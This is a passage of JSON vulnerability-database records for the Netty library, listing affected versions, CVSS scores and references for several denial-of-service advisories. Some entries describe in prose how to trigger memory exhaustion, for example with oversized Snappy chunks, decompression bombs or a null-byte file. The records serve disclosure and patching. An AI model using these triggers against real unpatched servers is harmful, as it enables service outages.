"4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.71.Final", "4.1.72.Final", "4.1.73.Final", "4.1.74.Final", "4.1.75.Final", "4.1.76.Final", "4.1.77.Final", "4.1.78.Final", "4.1.79.Final", "4.1.8.Final", "4.1.80.Final", "4.1.81.Final", "4.1.82.Final", "4.1.83.Final", "4.1.84.Final", "4.1.85.Final", "4.1.86.Final", "4.1.87.Final", "4.1.88.Final", "4.1.89.Final", "4.1.9.Final", "4.1.90.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final", "4.1.94.Final", "4.1.95.Final", "4.1.96.Final", "4.1.97.Final", "4.1.98.Final", "4.1.99.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-3p8m-j85q-pgmj/GHSA-3p8m-j85q-pgmj.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-3p8m-j85q-pgmj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58057" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/9d804c54ce962408ae6418255a83a13924f7145d" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-409" ], "github_reviewed": true, "github_reviewed_at": "2025-09-03T18:00:55Z", "nvd_published_at": "2025-09-04T10:42:32Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9vjp-v76f-g363", "published": "2021-09-09T17:11:31Z", "modified": "2024-03-11T05:32:25.452063Z", "aliases": [ "CVE-2021-37137" ], "related": [ "CGA-rmxq-xv79-3xfc", "CVE-2021-37137" ], "summary": " SnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way", "details": "### Impact\nThe Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well.\n\nThis vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.\n\n### Impact\n\nAll users of SnappyFrameDecoder are affected and so the application may be in risk for a DoS attach due excessive memory usage.\n\n### References\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185", "affected": [ { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.68.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/6da4956b31023ae967451e1d94ff51a746a9194f" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0012" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-09-09T14:44:10Z", "nvd_published_at": "2021-10-19T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-grg4-wf29-r9vv", "published": "2021-09-09T17:11:21Z", "modified": "2024-03-11T05:19:43.929590Z", "aliases": [ "CVE-2021-37136" ], "related": [ "CGA-xpcq-6m7h-f8qc", "CVE-2021-37136" ], "summary": "Bzip2Decoder doesn't allow setting size restrictions for decompressed data", "details": "### Impact\nThe Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression).\n\n\nAll users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack\n\n### Workarounds\nNo workarounds other than not using the `Bzip2Decoder`\n\n### References\n\nRelevant code areas:\n\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305", "affected": [ { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.68.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/41d3d61a61608f2223bb364955ab2045dd5e4020" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0012" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-09-09T14:36:56Z", "nvd_published_at": "2021-10-19T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-389x-839f-4rhx", "published": "2025-02-10T18:14:47Z", "modified": "2025-03-19T15:06:40.575662Z", "aliases": [ "CVE-2025-25193" ], "related": [ "CGA-3vm3-626v-4449", "CGA-ffqr-c78c-j6h2", "CGA-rp29-pprx-g77p", "CGA-xw98-j5vj-f79x", "CVE-2025-25193" ], "summary": "Denial of Service attack on windows app using Netty", "details": "### Summary\nAn unsafe reading of environment file could potentially cause a denial of service in Netty.\nWhen loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.\n\n### Details\nA similar issue was previously reported in https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv\nThis issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit.\n\n\n### PoC\nThe PoC is the same as for https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv with the detail that the file should only contain null-bytes; 0x00.\nWhen the null-bytes are encountered by the `InputStreamReader`, it will issue replacement characters in its charset decoding, which will fill up the line-buffer in the `BufferedReader.readLine()`, because the replacement character is not a line-break character.\n\n### Impact\nImpact is the same as https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv", "affected": [ { "package": { "name": "io.netty:netty-common", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.118.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.100.Final", "4.1.101.Final", "4.1.102.Final", "4.1.103.Final", "4.1.104.Final", "4.1.105.Final", "4.1.106.Final", "4.1.107.Final", "4.1.108.Final", "4.1.109.Final", "4.1.11.Final", "4.1.110.Final", "4.1.111.Final", "4.1.112.Final", "4.1.113.Final", "4.1.114.Final", "4.1.115.Final", "4.1.116.Final", "4.1.117.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.71.Final", "4.1.72.Final", "4.1.73.Final", "4.1.74.Final", "4.1.75.Final", "4.1.76.Final", "4.1.77.Final", "4.1.78.Final", "4.1.79.Final", "4.1.8.Final", "4.1.80.Final", "4.1.81.Final", "4.1.82.Final", "4.1.83.Final", "4.1.84.Final", "4.1.85.Final", "4.1.86.Final", "4.1.87.Final", "4.1.88.Final", "4.1.89.Final", "4.1.9.Final", "4.1.90.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final", "4.1.94.Final", "4.1.95.Final", "4.1.96.Final", "4.1.97.Final", "4.1.98.Final", "4.1.99.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-389x-839f-4rhx/GHSA-389x-839f-4rhx.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-389x-839f-4rhx" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25193" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/d1fbda62d3a47835d3fb35db8bd42ecc205a5386" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": 